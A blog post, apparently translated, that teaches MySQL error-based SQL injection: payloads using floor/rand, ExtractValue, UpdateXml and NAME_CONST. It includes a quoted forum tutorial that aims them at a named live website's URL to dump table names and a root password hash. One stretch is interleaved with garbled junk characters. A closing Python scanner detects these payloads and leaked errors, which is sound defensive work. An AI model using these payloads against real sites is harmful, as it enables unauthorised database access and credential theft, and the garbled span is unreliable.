
MySQL error-based injection: three error modes (floor, ExtractValue, UpdateXml) and how they are used

Posted 2015-11-11 19:03:37

1. Errors via floor()

Payloads such as the following can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union   select null union   select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2)));

An example follows.
First, a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error.

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

As you can see, the MySQL version is disclosed in the error message. To retrieve other data, replace version() with the subquery whose result you want evaluated.
For example, to retrieve the administrator username and password:

Method1:

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat((select pass from admin where id  =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'



Further collected material:

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
Error-based injection on newer MySQL versions: injection using NAME_CONST

It's been a while since I've made an SQL Injection tutorial, so I thought I should make a new tutorial using the method name_const. There aren't many papers documenting this method, so it feels kind of good to be the one to make a guide for it.

Background

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)

|---------------|
|     TEST      |
|---------------|
|       1       |
|---------------|

http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables
! L! p$ |: P4 B4 x
8 ~  L. E; Q+ V! f' EOnce you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.* ^. H! F& U! t  k  y
6 k; t* R  Z" }* M, u
Code:
2 @* j/ J+ @4 z: V' P4 {! [http://www.baido.hk/qcwh/content ... ;sid=19&cid=261
! A' z/ ]1 U: X& a9 F/ x* H4 U1 m
, g; x5 Z3 r! q% T, `) U+ s$ c
- }- ]3 H7 y. X( t2 H

/ X4 b1 Z9 w- r5 x6 S; q; `) ?* V9 K9 d' S
Code:4 i6 M* q2 U" @8 Y
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--" n' f& S9 i# d  w: \1 i+ U; l
/ N7 b9 Q; H9 l! r

& G, M6 e& t9 m* [% O2 OVAR = Your MySQL variable.' B" W7 l: J7 c7 a
/ y" F% M& K$ Z0 H
MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'

Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...

Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column 1 error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'

Now let's get the tables out this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here, if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'

Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'

Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

And there we have it, thanks for reading.
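As an added defensive example (written for this page, not code from the post or the quoted tutorial), the following Python scans constructed request/response log lines for the four error-based primitives discussed above (floor/rand/group by, ExtractValue, UpdateXml and NAME_CONST) and separately checks whether raw MySQL error text was echoed back to the client, which is the condition every one of these techniques depends on. The tab-separated "request, response" log format and the sample lines are assumptions.

```python
import re

# Signatures of the four MySQL error-based primitives shown in this post,
# matched case-insensitively against the URL-decoded query string or SQL text.
TECHNIQUE_PATTERNS = {
    "floor_rand_groupby": re.compile(r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\)", re.I),
    "extractvalue": re.compile(r"\bextractvalue\s*\(", re.I),
    "updatexml": re.compile(r"\bupdatexml\s*\(", re.I),
    "name_const": re.compile(r"\bname_const\s*\(", re.I),
}

# Verbose MySQL error fragments. These primitives only disclose data when the
# application echoes the raw DB error, so a match here confirms an open error channel.
ERROR_LEAK = re.compile(
    r"Duplicate entry '.*?' for key|XPATH syntax error|Duplicate column name", re.I)


def classify_request(query_string):
    """Return the names of the error-based primitives present in a query string."""
    text = query_string.replace("+", " ")  # '+' is a URL-encoded space in the post's URLs
    return [name for name, pat in TECHNIQUE_PATTERNS.items() if pat.search(text)]


def response_leaks_error(body):
    """True if a raw MySQL error message was returned to the client."""
    return ERROR_LEAK.search(body) is not None


def scan_log(lines):
    """Scan 'request<TAB>response' lines (an assumed, constructed log format) and
    return (techniques, error_leaked) for every line that carries a probe."""
    findings = []
    for line in lines:
        request, _, response = line.partition("\t")
        techniques = classify_request(request)
        if techniques:
            findings.append((techniques, response_leaks_error(response)))
    return findings


# Constructed sample log lines, modelled on the probes and error strings in the post.
SAMPLE_LOG = [
    "id=1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from"
    " information_schema.tables group by x)a)\tERROR 1062 (23000): Duplicate entry"
    " '5.1.33-community-log1' for key 'group_key'",
    "id=1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)))"
    "\tERROR 1105 (HY000): XPATH syntax error: '\\admin888'",
    # A hardened app returns a generic error: the probe is still logged, but nothing leaks.
    "id=1 and 1=(updatexml(1,concat(0x3a,(select user())),1))\tInternal Server Error",
    "id=330+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))"
    "+as+x)--\tDuplicate column name '5.0.27-community-nt'",
    "id=7\t<html>article 7</html>",  # benign request: produces no finding
]
```

The updatexml line is the case to aim for operationally: the probe is still visible for alerting, but the application returns a generic error page, so the error channel these techniques need is closed.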
